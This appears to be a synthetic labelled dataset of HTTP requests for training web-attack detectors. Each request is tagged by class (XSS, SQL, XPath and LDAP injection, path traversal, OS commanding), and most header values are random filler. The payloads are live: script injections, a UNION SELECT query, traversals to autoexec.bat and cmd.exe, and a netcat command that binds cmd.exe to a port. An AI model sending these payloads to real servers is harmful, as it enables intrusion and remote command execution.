Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 251.209.185.79
Cookie: oGCkxW1FI=Eh2;jnsq0mhftrd=onoeedhao
Cookie2: $Version="25"
Date: Fri, 16 Mar 07 08:38:43 CET
ETag: "a4XXHLvpw1u1qBnnZ1v"
Expect: fe8gaSr=na4I2h
From: m8Lou@dteama.it
If-Modified-Since: Sat, 10 Oct 09 01:36:50 CET
If-Unmodified-Since: Sat, 27 Jun 09 05:32:56 GMT
If-Match: "794uANdITxc9tjl"
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 45
MIME-Version: 3.3
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 24481-,44476-
Referer: http://taba.uk/Ederr/Nshfs.swf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.2 (compatible; S4he8; Solaris; oaivho; ateseenii)
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: 1.0 www.Eutphf0.shtml:753, ean/7.0 182.255.63.183, FTP/2.6 181.231.241.123:00117
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 36260359600073
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43746
Start - Id: 46640
class: XSS
GET /aeuUeDsmHrsf6erd/tQcDYF7BAeM.sDL3/2DaN/nmnilhbalfbYnemouAb/gyaslaity/IMaB-echobinl.Cybin2V_/xQwindow.openbD.ecYJv/viiEEdrcdugtnoo/HletanslnFxNoj.gif?JBF-L=024&b9=htpassu%26scriptt&lib54selectF=x.0iQ&a9=etttitelhiygY HTTP/1.0
Host: www.ntEiEeissa.fr
Connection: keep-alive
Accept: application/*, audio/basic;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: aini"    ><body%20onload=alert  (document.cookie);  >
Accept-Language: optSce-ct6bsntS, rb8-EiiecNot
Cache-Control: only-if-cached
Client-ip: 173.63.25.136
Cookie: deeaiqhrgle4gh=1;mes0het8eSf=6716746041;dsdMD3Vr=x95dOzRQ9a
Cookie2: $Version="007"
Date: Sun, 23 Sep 07 15:49:34 UTC
ETag: W/"EH3TK2WBSeCrrP1S"
Expect: reChrjl
From: iuaea@cvOyle.it
If-Modified-Since: Sun, 07 Mar 10 08:33:50 CET
If-Unmodified-Since: Mon, 23 Jun 08 18:34:07 UTC
If-Match: *
If-None-Match: "XgHaQqjfqaM@UO5zdT"
If-Range: *
Max-Forwards: 1357
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW9kdFRlZTpjY2Vs
Authorization: Digest nc=ba24d2A6
Range: 118-482,-132
Referer: /Cnornah/6e8e/mtoaonJ/rsSy.jpg
TE: trailers,trailers,deflate;q=0.2
Trailer: Via
User-Agent: Mozilla/5.8 (X11; U; Solaris 7.9; dp-l8; rv:2.0.6) Gecko/26446456
UA-CPU: PowerPC
UA-Disp: 7368,254,8
UA-Pixels: 4819x5235
Via: 4.5 www.aibs.js, 4.4 www.xiysicoe.tiff
Transfer-Encoding: deflate
Upgrade: Ecza/9.5
Warning: 757 108.116.185.191 "ocitEnelehtRjoDnesur" 
X-Serial-Number: 4075489
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46640
Start - Id: 49218
class: XPathInjection
GET /olglayDxiLEs/LtriikmVbgsoundM/tB-Uo3XqWHUm.exe?oeanyC=n%40e+Oz%7CT&itht8nrt=6616+++or+l%2F5ati%2Fxbudt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+++or+71%3D&jaeeias=ESezCdropselectnd9b+rbnsam4&yvFcaFG5=eLYEMAv&L839xOhttpsOwp-vj=rma&ost7feetoynre=esgwtpsI&yfnra=ini0&3tar=m1tOmav&PZvHsz8tZRrA=dr2nhn&jpdhie7e5erU=iD07&G_wZ_=ee9tiOli5d&v1h-CD0=91&JperlLknaP-zrmaz=kj0le48sssaq&llayu9rnrvls=33 HTTP/1.1
Host: www.qu6xcrl.com:38
Connection: close
Accept: application/zip, application/x-tar, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity;q=0.2, identity, identity;q=0.4, deflate;q=0.2
Accept-Language: *;q=0.8
Cache-Control: max-stale=393
Client-ip: 214.106.9.213
Cookie: KsiRT=eibsm;jayag=47618;A38m-eMlG=ec;hA6nieshR=earf;erhs=cabutsrb
Cookie2: $Version="42"
Date: Fri, 18 Sep 09 03:39:20 GMT
ETag: W/"wAUDMUpn_TbvD5aG66"
Expect: 100-continue
From: 92fxf@rrjet00.biz
If-Modified-Since: Wed, 05 Jul 06 01:14:10 GMT
If-Unmodified-Since: Sun, 06 Aug 06 14:47:10 GMT
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: "wWvispkK_6fpp.9ck"
Max-Forwards: 3969
MIME-Version: 9.6
Pragma: 7uehSe3=mvmng
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: negtt esueab=hroeocn
Range: -392691
Referer: http://zcKb.de/tmcre/earht.mspx
TE: trailers
Trailer: Authorization
User-Agent: oalt8teudltsncav
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49218
Start - Id: 43571
class: OsCommanding
GET /Tfs-K92fA6wgetserviceswcnode/no9passwdxXwautoexec/h5hX1Y4kHbi8dIx1f4/catQ/tqtttm/uo5uo7ttlbehdNEdc/gh-cM9Vde/linkX/a7eNsotott4btnEE1iea/3hrr.shtml?q9otWhtl=90&dia=v&rhnoGdt=%3Cqla&eo=lrotoformwn2naYs&ttda=08169305&nSnbesdeto=7&6ttecselY=9setk&tr=s%3Arac%3C&tl7LRshhe=80987299&PupepthwynOr=76&sinlO=670582969&gtrq0iE=4876939&eat5Oreg=%7C+++ps+++++-auxwww+++++%3B&yee1Her=sp5 HTTP/1.1
Host: www.zdom8a.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.4, iso-8859-6;q=0.1, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 70.59.213.33
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="361"
Date: Thu, 29 Dec 05 22:56:28 CET
ETag: W/"2Mpn4nO2vwMkkK-Rd"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Fri, 02 Apr 10 03:29:44 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Jun 09 08:07:19 CET
Max-Forwards: 451
MIME-Version: 5.9
Pragma: no-cache
Authorization: elmN itezwio=tsro
Referer: http://aa1ki.org/weego.tar
TE: trailers
Trailer: Host
User-Agent: bbsumwn/8.0
UA-Pixels: 569x2891
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: compress

null

End - Id: 43571
Start - Id: 48170
class: XSS
GET /Qogmu6d7lLerdea7eM/aonkieemlauolkrej/6gXxmElxVU.htm?@PZ0a@vdCxp_Xhtpassn=MXLxuas837McDmcart&Atrmm9nhibn=kC2dh&iqcrugymjtrme=159615017&ms=%3Chnae%3As%3C5li0i0ns2n&m1seSusytnne=638939242&zPZI=k%7CscoszF&im=lae%3Et&ssosh=+TLre+aoo+hb&tpStrt=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Balert+++%28%27euneg%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E HTTP/1.0
Host: www.gaanrs.net:6271
Connection: close
Accept: audio/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.3, identity, compress;q=0.0, deflate, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 7.40.188.105
Cookie: dseIeaenhNoxe=orautoexecn;ottamttgnrOio=ele sa=>v+:locationmOye:sdb
Date: Fri, 02 Dec 05 20:41:43 GMT
ETag: W/"z-GNnMAzDnPnyqI"
Expect: 100-continue
If-Modified-Since: Thu, 24 May 07 04:07:58 UTC
If-Match: "mx_RW7NTuKTeqxpQRUs"
If-None-Match: "o3Ik5jtSWNwo763Gh3"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.5
Pragma: no-cache
Authorization: aeeiei nixAio=naeo29H
Range: 225-,-098229,-7852
Referer: http://eHegne.it/migejses/eBdNrn4.png
User-Agent: Mozilla/0.4 (Windows; U; WinNT 2.4; os-et; rv:9.3.6) Gecko/29321374
Via: 2.0 www.9tudhe.jpg, 0.3 www.sD5eafn.htm:31655
Transfer-Encoding: sHwd
X-Serial-Number: 17322
----: ---------------------------

null

End - Id: 48170
Start - Id: 45490
class: PathTransversal
GET /hNsaR8HCpHH/edm.swf?0FL4lwEmnA=ceMysdehup8iit&FYlSC=700389&zh=ew+a%3C&wiullAi=he&cawyw=sazrIZLJ8sv6&ei8=t6oAYvMO&asi9=ryeZJbPN&aYabjodyA9=274483&eubrignxu=34567&Ovar8mo9mJ-O=0dr6gRtTh1caeecag&mcnbeinsq=..%2F..%2F..%2FWINNT%2Fautoexec.bat&samhnsaEn9x0Us=540&2nsreelifya=ppixsodyexecoposition HTTP/1.1
Host: www.ieDu95emz.fr
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-kr, iso-8859-5;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: e1nbeca-foe
Cache-Control: min-fresh=82
Client-ip: 165.251.254.128
Cookie: aixhn5ceph3llln=4sredeleteacrt6 3orna;J7N.5Ot=ntas
Cookie2: $Version="39"
Date: Sun, 11 Apr 04 21:48:52 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Tue, 15 Sep 09 06:41:04 CET
If-Unmodified-Since: Sat, 12 Jan 08 14:39:54 UTC
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: "FzBVVuE0R8N40Oi9mxM"
Max-Forwards: 98
MIME-Version: 4.8
Pragma: o8an=ot
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: Basic eXFnZHA6YWVhaGRneg==
Range: 7-
Referer: http://www.oetcoh.ch/toeyhe/stwhdot/srandtp/hegR.bin
TE: deflate,chunked,deflate;q=0.4
Trailer: Expect
User-Agent: Mozilla/9.4 (Windows; U; Win98 8.0; w0-hs; rv:4.3.0) Gecko/67283388
UA-CPU: PowerPC
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: HTTP/2.2 www.oOeh6.css, 6.4 www.o7xam1q.shtml
Transfer-Encoding: dlra; 8toi=srrd
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 224.80.9.55
X-Serial-Number: 15968241
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45490
Start - Id: 44804
class: PathTransversal
GET /BFGnph-T3M1RK/oRF_IKLSVwppboc3a-h/tfRHb7ILQYp0w/MZ/hIlspYFr_1/iBQCzL.Mc7NzEs6A/oYIimgrnM/rvYgZ5xs/htcrSt8/yegnscts76/hKIx8iUsW.mdb?rtnNos=6JjY2y6QO&cQxmfgasG=p5pU2&gSde3meta=y0lhiTrneaaur3ern&esnNU=0697569&mobeuiapryl=%26pe9+pfYn&ie0raueu7zq=r4utr&oiftcce=475389&A7PLWd=..%2F..%2F..%2Flltein%2Fadmin.txt&wqD59=znpgc0a&dnypedmpe=c&yEetirraqa6D=417797206&5S=derou9ogfTt&81s741rv7rlr=oE4wokhkssninf1b8v&xu4itcoaanw3uto=i1hwNl4uyrZ&d2or=6296572054 HTTP/1.0
Host: 61.100.165.193
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-936;q=0.8, x-mac-korean;q=0.0, koi8-r, macintosh;q=0.7, windows-1252;q=0.5
Accept-Encoding: deflate;q=0.1, gzip, gzip;q=0.5, deflate;q=0.0
Accept-Language: adl-m;q=0.4
Cache-Control: no-cache
Client-ip: 66.66.94.9
Cookie: ntevantmFIwsat=tyteguHhINo;untJaat1=oeot bgsoundsr;gwmarsnaNrer=tE1Avjmye3
Cookie2: $Version="8"
Date: Tue, 16 Mar 10 24:51:25 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sat, 28 Apr 07 10:41:19 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: "smgY2HBXv1S8bJS1NRj"
If-None-Match: *
If-Range: Mon, 13 Jul 09 12:38:18 UTC
Max-Forwards: 60
MIME-Version: 7.4
Pragma: c9bk=8ledjtw
Proxy-Authorization: onlbd lq3no=7uhTO
Authorization: Basic c2FpYTptdGExUmxv
Range: -83
Referer: http://ldGhc.com/Eattt/wos0sdnc/eDmtird.tar
TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: Mozilla/9.5 (compatible; yeee; Open BSD i386; ddas)
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 0.6 www.0p2c.js:9182, 6.5 www.E3t5ris.jpg, emlc/4.4 www.egey.css
Transfer-Encoding: identity
Upgrade: nraObn/3.7
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44804
Start - Id: 37401
class: LdapInjection
GET /NAvFpaW0IHFGn/openrWxFnodelI4YolinknZ/f7TcMajVWiVgpP/1bVLp/e8XFk/bsejsxNN4oA8hPpUUtlx/ca5eysOxuofeRge6oco/iDnRodravefNnnD.htm?c2hdetbeXcom=90707079&l3BvTnwoj=aperlsystem2ofsecat0t%28pt&edq=aons8eeecaaepIAhne&ubpiEpts=tbfo9s529&ao=mKhxoVmq&CoptUQSP3HRjy=53&1t0lalkatsaTsjh=tl1t5r%244hmmttp&LduKSyFU@c=9+3+ HTTP/1.1
Host: 20.155.164.223
Connection: Crjnirt
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.3, windows-1251, x-mac-greek;q=0.0
Accept-Encoding: *
Accept-Language: rh-rae6nrl;q=0.6, ia5nppxp-a
Cache-Control: max-stale
Client-ip: 97.191.125.72
Cookie: z9C=593;aWV_oHcT=lso r;tLn8lK=er)(&(objectClass  =  hLhe*);ttf3pmhJanejrs=@thp
Cookie2: $Version="96"
Date: Sun, 23 Jul 06 12:49:02 GMT
ETag: W/"I4bxWhF3dD.58ZB"
Expect: 100-continue
From: a9rhuT@wsiL.cz
If-Modified-Since: Sun, 12 Jun 05 12:46:38 CET
If-Unmodified-Since: Wed, 31 Aug 05 11:05:52 GMT
If-Match: "1kBtzSWviYaCyf9k"
If-None-Match: "855wpXm@.hX0e7tl"
If-Range: "jUYSnmu4@NakslGW"
Max-Forwards: 352
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aHNkZjpyc29lZQ==
Authorization: NTLM aGFyck9lRGxCN01lZnVJdG5yQW91YW9lYXRuaFhyd2NwZW5h
Range: 92271-,85-
Referer: http://www.ObSdte.it/pzeaorz/eimW6m/iuorfa.jpg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 9.0; cr-r1; rv:0.9.7) Gecko/34315528
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
Via: 1.4 35.151.29.63, HTTP/0.5 www.aaTaOee.jpg
Transfer-Encoding: deflate
Upgrade: ontd/7.5, eEr1lt/2.5
X-Serial-Number: 42967168718609635
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37401
Start - Id: 42440
class: SqlInjection
GET /ottel/rtainsegdnTe/fb/ePHDWFFncebSFk/tr0GaYcI5-e3wfEVI./ePQOj7/pa18f8/oPq6P@fFKsBq/heCtU.mdb?ojvsTnIswws=ew+O8andotpt%3B&eHbeirhpxutn87=tV.&rtea9q9w=%27%29++++UN%2F**%2FION+++ALL+SEL%2F**%2FECT+%27unsrvn%27%2C29350%2C19%2C%272on6teeeeq%27%2C9+++++FROM+ltccrs++WHERE++++%28%27%27++%3D+%27&rte=s&6.q.V@K=e%26&aWtay8yjmjrte=85198&le0esavsteswe=67&uy9nml=9322793&ons=s+p0&TcMnUns8e=tke&sfa9=zK1O1odH2T HTTP/1.1
Host: 118.254.234.248
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=503
Client-ip: 138.240.240.225
Cookie: cruyna=sR;nFeDaoynpliR=ht)updatea;hiihf=34008;ksvblanu5p2ty=l;nIa]tTAdyui;atrc:;iyno=52718;X2Skg488d=kaodxAhhsro
Cookie2: $Version="2"
Date: Wed, 28 Jan 09 07:08:46 CET
ETag: W/"OW_oBv4XGNtza5TpHP"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Thu, 19 May 05 10:03:16 GMT
If-Unmodified-Since: Sun, 19 Apr 09 01:10:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 24:55:53 UTC
Max-Forwards: 2859
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: -13
Referer: http://m6trfnt.de/oiin4efn/rnhl.pl
TE: chunked;q=0.5,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: sveglAet (dqmr024Utw; h13749k; qslo2Nbk; tOcJzgP3; vFQpewBOIo)
UA-CPU: PowerPC
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: lne2/0.3 www.xeoEo4e5.tiff, 6.2 221.39.36.48, 8.8 174.233.137.227:2
Transfer-Encoding: deflate
Upgrade: 5ues/5.0, s5cxlt/6.5
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42440
Start - Id: 49409
class: XPathInjection
GET /3_Py8p2VDRQYWFHjxd.html?8G2ol6viu=kged1tunionlne%5Dtmpht&eczoalhe=Fng%27%5D+%7C++++P++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++%29%3D++++%27dmu&naws1iseam1h=lm4++mochaesde&3alewkn6pi=l%3Fwudh%7E+ilo%7C+where HTTP/1.1
Host: www.mhsyom.st:5703
Connection: leRcba
Accept: application/*;q=0.1
Accept-Charset: cp-936;q=0.8, iso-10646-ucs-2, euc-tw;q=0.8, iso-8859-7, iso-8859-7;q=0.7
Accept-Encoding: compress
Accept-Language: adlo-hhtgti0s;q=0.9, Swhmws-0;q=0.5
Cache-Control: no-cache
Client-ip: 86.141.178.217
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="6"
Date: Thu, 01 Nov 07 08:56:58 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Thu, 25 Mar 04 23:29:24 UTC
If-Match: "J1YUKMPgkQ8NIYrH"
If-None-Match: *
If-Range: Thu, 08 Oct 09 06:54:41 GMT
Max-Forwards: 41
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://uhd5.st/1ylpTftv/sboLDps8/Nrns/Ttaaoxo/edctDl.pl
TE: trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/4.7 (compatible; ikWie4aa; WinNT; faerzDo6; jqipAi)
UA-CPU: StrongARM
UA-Disp: 7200,5804,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: deflate
Upgrade: dec/5.5, 4kklt/1.7
Warning: 259 181.39.207.59 "lyfafwp21tof" "Tue, 30 Mar 10 05:45:15 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49409
Start - Id: 49151
class: XPathInjection
GET /o@lCerYWnjOX75Un0Y/toc4fswgrehagrmdrlh/TrsqlntInar/3xqPJV9OnaJ.swf?si2lh9sEsashv=99&acdnaor=18089&edjene7nNL=oAh&c4con=tv8rpav&hI=jloqaee%27++++or+++++%28i+%3C++++count%282g5h%2Fchild%3A%3Atext%28%29%29++and++j+++%3C++count%28eaZ%2Fchild%3A%3Acomment%28%29%29++and+++k++++%3C+++++count%28teqt%2Fchild%3A%3A*%29++%29++or+++%27rasedwlt%27+++%3D++%27++L464%27++++or&Dps=Inco+C&afoH8hsn=e%3Bo4saO%3Butetir HTTP/1.0
Host: www.1enexs.be
Connection: close
Accept: image/*;q=0.6, application/*, image/png;q=0.6
Accept-Charset: euc-kr
Accept-Encoding: compress, identity, gzip;q=0.5, gzip, deflate
Accept-Language: CtbiTeRi-en, f-taEu, o6i62ms-npt;q=0.1, zuzi-jn, k0-geaziNz3
Cache-Control: no-transform
Client-ip: 204.49.188.29
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Sun, 07 Jun 09 22:57:39 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 07 Jan 05 15:46:05 CET
If-Unmodified-Since: Thu, 12 Mar 09 05:51:19 UTC
If-Match: "2AnE0fOiLi1DTj2hTH2"
If-None-Match: *
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 8230
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: Basic cmxhaWFyOngzc2RxbHAx
Range: 4916-
Referer: /yl9tto/wRn5Ter.css
TE: trailers
Trailer: Pragma
User-Agent: feaEeedeetbd
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 3.4 www.oime.shtml
Transfer-Encoding: gzip
Upgrade: yfI/3.6
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49151
Start - Id: 42900
class: OsCommanding
GET /eetS/Tyt4eh/Rfh/6-mH@fViME/hbAFD2WSSzg/sR_PN81Bn1R2A/n7T79dtimnroesqs8et/ogO/e3JKxeb/CGVQL.mspx?C8Hg0q9=w6QI%40%403-n&tMnRM1wGUslr=ermub7sErEand5i&ue=6e&vMEu=gga&o8hNet=qao&d8phpR=ex&Dp5jQILVesG=da&be6ESfrompWrKvj=%7C++shell%28+%22cmd++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe+++-l++-p+++3046++++-t+-e++++cmd.exe+%22++++%29%7C+++%27&t9=76&p9nteEp=ddss&sKOp=%5Bdd1lib&ohrkri=%26pm&a1uts=ureposcalees&idMK8unionA=yFIs HTTP/1.0
Host: www.3ytulE.it
Connection: nnhvmis
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: anuh-drkosy;q=0.8, 0fhgNt-1L6ba;q=0.7
Cache-Control: max-stale
Client-ip: 93.245.80.9
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="4"
Date: Wed, 21 Jul 04 07:33:04 CET
ETag: W/"AgkTXED.n5oFVon"
Expect: torrt
From: Osrmorba@tAdnt9t.st
If-Modified-Since: Mon, 27 Aug 07 23:11:13 GMT
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: *
If-None-Match: "pLniMe-yAxV60kf"
Max-Forwards: 396
Pragma: oogudr='t1l'
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: tldlts hhoe5i9=etntdiI4
Range: -35,510946-8117,-846229
Referer: /rriyAny/rIkl.cfm
TE: trailers
User-Agent: Mozilla/8.6 (X11; U; Linux i386 2.5; sf-ni; rv:9.4.4) Gecko/38510498
UA-Disp: 2272,6803,16
UA-OS: Win98
UA-Color: color32
Via: 6.7 www.cHthSfgh.tiff, bkvo/4.2 www.pr98abd.js, 8.8 179.132.227.129
Transfer-Encoding: identity
X-Forwarded-For: 191.162.116.219
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42900
Start - Id: 44231
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.aLwevwnaia.st
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, x-mac-korean;q=0.3, windows-1250;q=0.6, utf-8;q=0.0
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Sun, 15 Aug 04 05:05:32 GMT
ETag: "tzNRwsuen.u4CaPKh"
Expect: aoaigdm=rnakey;sl6yntc=sonie
From: ided@udhoes.uk
If-Modified-Since: Wed, 22 Apr 09 07:55:48 UTC
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: *
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 366
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: todoif 86auyni=mfqem
Range: 734241-576218
Referer: http://rlhmcsf7.cz/sesi/OSbmRwlt/5olvqo84/eoig.js
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 0.1; am-pr; rv:6.5.1) Gecko/15667509
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: 7.3 29.110.155.152:8, FTP/2.0 www.erohGys.html, 5.4 196.0.235.156
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44231
Start - Id: 47159
class: XSS
GET /gczBRuW5/noudnlIrajc3ke/wiIwELHHP/o6o1z/1ditctit9iuptiwd/ydR9ps-gde9vq2Nnd.swf?fostBioE=X%28o5oncexecaccess_log%2B&Apfrom3v8R4h=emlh8oeteieiesaaa&taaccq=694027&loada=n%3Ecd&IT2sno=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript%3E%5Balert+%28%27rz3uk1%27%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&lea=thc&tmpg-vHHew=Isag&mun=9&allTDzRBXxtermcmd0Ud=%7Etnode&ZnKLvv0@K.u=e%5Con%2Bo1zr&yetshcewo1r4t=790891357&hGallS=rinzoE6iHyt&n4BKevalPg2L=510&etdzasge5nig=668794 HTTP/1.0
Host: www.0etra.org:80
Connection: close
Accept: audio/basic;q=0.7, video/*;q=0.9, application/*
Accept-Charset: iso-2022-jp, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: edmhyfo-oelpreel;q=0.4
Cache-Control: no-store
Client-ip: 35.253.169.121
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="988"
Date: Fri, 01 Jul 05 20:51:53 GMT
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: ssietn1a
From: rRktr@tnrerr.uk
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: "fg1D@u5do8NGQxV5A"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 2851
